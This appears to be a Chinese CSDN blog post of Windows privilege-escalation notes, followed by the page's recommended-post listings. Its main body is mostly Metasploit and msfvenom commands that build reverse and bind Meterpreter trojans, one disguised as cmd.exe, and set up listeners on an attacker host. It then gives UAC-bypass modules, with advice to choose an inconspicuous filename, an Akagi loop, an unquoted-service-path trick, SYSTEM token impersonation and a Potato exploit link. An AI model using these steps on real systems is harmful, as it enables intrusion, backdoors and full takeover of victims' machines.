Windows提权

已于 2024-03-16 16:19:41 修改
阅读量1k 收藏 18
点赞数 27
分类专栏: 内网提权 文章标签: windows 网络安全 web安全 安全
于 2024-03-16 16:17:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74413354/article/details/136764629
版权
本文详细介绍了如何通过内核溢出进行提权,包括使用Metasploit框架的exploit模块,如systeminfo收集系统信息,生成后门木马,以及利用UAC漏洞、CVE-2019-1388和配置错误提权的方法。还涉及了Meterpreter的使用和安全漏洞的利用技巧。
摘要由CSDN通过智能技术生成

内核溢出提权

系统信息收集
msf -- shell -- systeminfo

exp链接

提权辅助网页 Windows提权辅助

http://blog.neargle.com/win-powerup-exp-index/

msf生成后门木马:

使用 exploit/multi/handler监听木马反弹过来的shell:

命令:

msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;

use exploit/multi/handler # 监听木马反弹过来的shell

msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;

set lhost 192.168.x.x # 我们的kali本机ip

set lport 6666 # 我们的kali本机端口

exploit

使用msfvenom模块生成反弹木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.X.X lport=6666 -f exe -o test.exe

伪装成cmd.exe

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.x.x lport=6666 -x cmd.exe -f exe -o test.exe

正向监听:

msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;

use exploit/multi/handler # 使用这个模块连接远程木马;

set payload windows/x64/meterpreter/bind_tcp # 设置正向连接payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;

set rhost 192.168.x.x # 目标主机ip

set lport 6666 # 我们的kali本机端口

exploit

使用msfvenom模块生成正弹木马:

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.x.x lport=6666 -f exe -o test2.exe

复现:

生成后门木马

启动监听

启动木马

通过shell工具上传我们得木马

执行后成功上线

查看打了哪些补丁

shell

systeminfo

对应网站查找exp

通过msf内置框架

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.162.132 LPORT=4444 -f exe > shell.exe

启动监听

运行木马

查看补丁信息

run post/windows/gather/enum_patches

查找exp

run post/multi/recon/local_exploit_suggester

UAC绕过提权

使用exploit/windows/loacal/ask模块绕过UAC

use exploit/windows/local/ask

set filename 123.exe #设置运行程序名,尽可能设置一个不易发现的名字。

set session 17

set lhost 192.168.xx.xx

set lport 2333

run

exploit/windows/local/bypassuac模块绕过UAC

use exploit/windows/local/bypassuac

set session 7

set lhost 192.168.xx.xx

Set lport 2333

Run

利用CVE-2019-1388绕过UAC提权

使用Akagi.exe配合msf提权

for /L %I in (1,1,76) Do @Akagi64.exe %I 后门程序路径

系统配置错误提权

C:\Program Files (x86) \Application Verifier

没有引号来闭合,中间留了空格,系统会把前面默认为程序,后面忽略

可以利用msf生成Program Files (x86).exe

令牌窃取提权

meterpreter > use incognito #进入incognito模块

meterpreter > list_tokens -u #列出令牌

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" #模拟令牌

烂土豆提权

GitHub - foxglovesec/PotatoContribute to foxglovesec/Potato development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/foxglovesec/Potato

小白鱼来了
关注
  • 27
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
系统提权之:Windows 提权
f_carey的博客
11-04 1316
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
windows提权思路
weixin_68210863的博客
10-29 1091
windows十四种提权思路笔记
windows提权
qq_38675102的博客
12-31 2218
windwos提权自学笔记-保持更新
Windows 提权
qq_53742230的博客
07-15 3619
Windows 一些提权手法总结
windows提权总结
m0_52329625的博客
01-08 1174
自己总结学习的一些Windows提权思路,借鉴了许多网上公开的教程思路总结的一篇文章
Windows提权方法简单总结
good good study
03-23 9718
提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。 在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
windows提权辅助在线平台
siu~
08-10 773
提权,网络术语,提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
Windows提权辅助工具
LuckySec
04-24 978
0x01 工具介绍 该在线提权辅助工具收录了微软所有Windows权限提升以及命令执行资料,并实时更新,并且可以根据systeminfo信息找到未修补的漏洞和已经修补漏洞。 在线工具地址:https://i.hacking8.com/tiquan 0x02 工具使用 首先搜集Windows系统的补丁号或者systeminfo信息 然后将其systeminfo内容复制到在线辅助工具文本栏里 等待查询结果,即可看到目标系统可能存在的提权漏洞相关信息 ...
Windows提权方法
最新发布
m0_60870041的博客
12-12 1195
如何进行内网渗透?
windows提权-快速查找exp(第一课).docx
04-26
Windows提权与APT攻防】\n\n在网络安全领域,Windows系统的权限提升(Privilege Escalation)是攻击者常用的手段之一,用于获取系统更高级别的访问权限。本篇将详细讲解如何快速查找并利用公开的exploit(漏洞利用...
windows提权工具
01-15
可以对win2K3-win2012 server进行提权 win7也可以,win10没试过
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
windows提权命令 .docx
12-02
以下是一些常用的Windows提权命令,以及它们的工作原理: 1. **net user**: - `net user` 命令用于查看、添加、删除或更改用户账户信息。例如,`net user` 可以列出所有用户,而 `net user 用户名 密码` 可以用来...
windows提权漏洞
08-02
提权漏洞
yyctf#study#windows提权1
07-25
nmap 扫描445端口是否开启net localgroup administrators xxxx /add(将用户设置为管理员权限)set target 1
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
CVE-2021-36934:Windows提权漏洞1
08-03
1. 漏洞描述 1. 提取和利帐户密码哈希 2. 发现原始 Windows 安装密码 3. 获取 DPAPI 计算机密钥,可于解密所有计算机私钥 4. 获取个电
windows7提权
04-26
Windows 7操作系统中,"提权...总结来说,Windows 7提权是一个涉及系统安全与便利性的过程。了解如何正确、安全提权,对于系统管理员和开发者来说至关重要。在实际操作中,要遵循最小权限原则,避免不必要的风险。
windows 提权
08-27
Windows提权是指获取管理员权限或系统级权限的过程。在某些情况下,普通用户需要提升权限以执行某些操作或访问受限资源。 有几种常见的Windows提权方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值